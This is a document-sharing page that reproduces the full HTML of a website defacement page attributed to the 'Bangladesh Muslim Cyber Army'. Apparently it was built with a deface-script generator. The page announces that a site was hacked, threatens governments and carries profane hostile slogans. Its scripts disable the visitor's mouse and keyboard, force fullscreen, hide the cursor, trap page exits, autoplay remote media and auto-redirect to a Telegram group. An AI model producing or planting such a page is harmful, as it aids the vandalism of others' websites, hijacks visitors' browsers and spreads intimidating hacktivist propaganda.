0% found this document useful (0 votes)
20 views4 pages

Hacked by Muslim Cyber

The document is an HTML page displaying a defacement message from the 'Bangladesh Muslim Cyber Army' claiming to have hacked a website. It features a warning against interference in Bangladesh's matters, along with a video and audio playing in the background. The page includes various styling and scripting elements to enhance the visual impact of the message.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
20 views4 pages

Hacked by Muslim Cyber

The document is an HTML page displaying a defacement message from the 'Bangladesh Muslim Cyber Army' claiming to have hacked a website. It features a warning against interference in Bangladesh's matters, along with a video and audio playing in the background. The page includes various styling and scripting elements to enhance the visual impact of the message.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

<!

--
-- Downloaded from : https://haxor.my.id/save/Hacked_By_Muslim_Cyber.html
-- Official Web : https://prinsh.com
-- script-deface-generator.prinsh.com
-->

<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="title" content="Hacked By ./DrVee_404">
<meta name="description" content="Esteem Restoration Eagle">
<meta name="keywords"
content="hacked,deface,website,whitehat,defacer,hack,mirror,Esteem Restoration
Eagle">
<meta name="robots" content="index, follow">
<meta name="revisit-after" content="60 days">
<meta name="author" content="Drv7.ID">
<!-- Auto-redirect after 20 seconds -->
<meta http-equiv="refresh" content="20; url=https://t.me/+-nDmgIBTO39mZGFl">
<title>Hacked By Bangladesh Muslim Cyber Army</title>
<meta property="og:image" content="https://i.ibb.co/4ccZNPz/images-19.jpg">
<meta name="theme-color" content="#000">
<link rel="icon" type="image/png" href="https://drvee07.github.io/eagle.png">
<link href="https://fonts.googleapis.com/css?family=Acme" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?
family=Reggae+One&amp;display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-
awesome/4.7.0/css/font-awesome.min.css">
<script
src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
</head>
<body bgcolor="black" text="white" oncontextmenu="return false;"
onkeydown="return false;" onmousedown="return false;"
onclick="document.getElementById('lagu').play();fs()" id="body"
onload="typeWriter()">
<style type="text/css">
center {
font-family: Acme;
}
img {
opacity: 80%;
}
red {
color: red;
}
#background-video {
height: 100vh;
width: 100vw;
object-fit: cover;
position: fixed;
left: 0;
right: 0;
top: 0;
bottom: 0;
z-index: -1;
background-color: black; /* Background color set to black */
}
font {
text-shadow: #000 0px 0px 3px;
-webkit-font-smoothing: antialiased;
}
div {
animation: glitch 1s linear infinite;
}
@keyframes glitch {
2%,
64% {
transform: translate(2px, 0) skew(0deg);
}
4%,
60% {
transform: translate(-2px, 0) skew(0deg);
}
62% {
transform: translate(0, 0) skew(5deg);
}
}
div:before,
div:after {
content: attr(title);
position: absolute;
left: 0;
}
div:before {
animation: glitchTop 1s linear infinite;
clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
-webkit-clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
}
@keyframes glitchTop {
2%,
64% {
transform: translate(2px, -2px);
}
4%,
60% {
transform: translate(-2px, 2px);
}
62% {
transform: translate(13px, -1px) skew(-13deg);
}
}
div:after {
animation: glitchBotom 1.5s linear infinite;
clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
-webkit-clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
}
@keyframes glitchBotom {
2%,
64% {
transform: translate(-2px, 0);
}
4%,
60% {
transform: translate(-2px, 0);
}
62% {
transform: translate(-22px, 5px) skew(21deg);
}
}
</style>
<script>
window.onbeforeunload = confirmExit;
function confirmExit() {
return "Are you sure? wkwk";
}
function fs() {
var elem = document.documentElement;
if (elem.requestFullscreen) {
elem.requestFullscreen();
} else if (elem.msRequestFullscreen) {
elem.msRequestFullscreen();
} else if (elem.mozRequestFullScreen) {
elem.mozRequestFullScreen();
} else if (elem.webkitRequestFullscreen) {
elem.webkitRequestFullscreen();
}
document.getElementById("body").style.cursor = 'none';
document.onkeydown = function(e) {
return false;
}
document.addEventListener("keydown", e => {
if (e.key == "F11") e.preventDefault();
});
}
</script>
<script>
document.addEventListener('DOMContentLoaded', function (event) {
var dataText = ["Wh00pz! Your security is down!", "About warning message
for Indian RAW: Do not interfere in our country's matters."];
function typeWriter(text, i, fnCallback) {
if (i < text.length) {
document.getElementById("hekerabies").innerHTML = text.substring(0, i +
1);
setTimeout(function () {
typeWriter(text, i + 1, fnCallback);
}, 150);
}
else if (typeof fnCallback == 'function') {
setTimeout(fnCallback, 7000);
}
}
function StartTextAnimation(i) {
if (typeof dataText[i] == 'undefined') {
setTimeout(function () {
StartTextAnimation(0);
}, 30000);
}
if (i < dataText[i].length) {
typeWriter(dataText[i], 0, function () {
StartTextAnimation(i + 1);
});
}
}
StartTextAnimation(0);
});
</script>
<audio src="https://flaneroo.com/HACK.mp4" autoplay="true" id="lagu"
loop=""></audio>
<video id="background-video" src="https://flaneroo.com/HACK.mp4" autoplay=""
loop="" muted="" style="position: fixed;object-fit: cover;"
poster="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQ
VR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=">
<source src="https://flaneroo.com/io.mp4" type="video/webm">
</video>
<table width="100%" height="80%">
<td>
<center>
<img border="0" src="https://i.ibb.co/4ccZNPz/images-19.jpg"
alt="ace33f7757bb2f4c1110de40c20a6519.jpeg" width="340" height="340">
<font face="Reggae One" color="red"><h2>Hacked By Bangladesh Muslim
Cyber Army</h2><p><h3>[+] @t_gray_hacker is here, no system is
safe!</h3></p></font>
<p>WE ARE BANGLADESHI GRAY HAT HACKERS!!</p>
<p> be ready to face us! </p>
<p>dear Israeli Government stop killing innocent people. or face our
cyber Attack, we Are anonymous, we are legion...We protect Muslim & Bangladesh</p>
<p><font color="red">$</font> Greetz <font color="red">$</font></p>
<p>| ANONSEC BD, MTB, Anonymous Bangladesh Hacker, rootbnz Fack Israel
|</p>
</a>
<p>[+] /Fuck Israel Hacked By Muslim Cyber Army BD[+]</p>
<div id="hekerabies"></div> <!-- Message will appear here -->
</center>
</td>
</table>
</body>
</html>

You might also like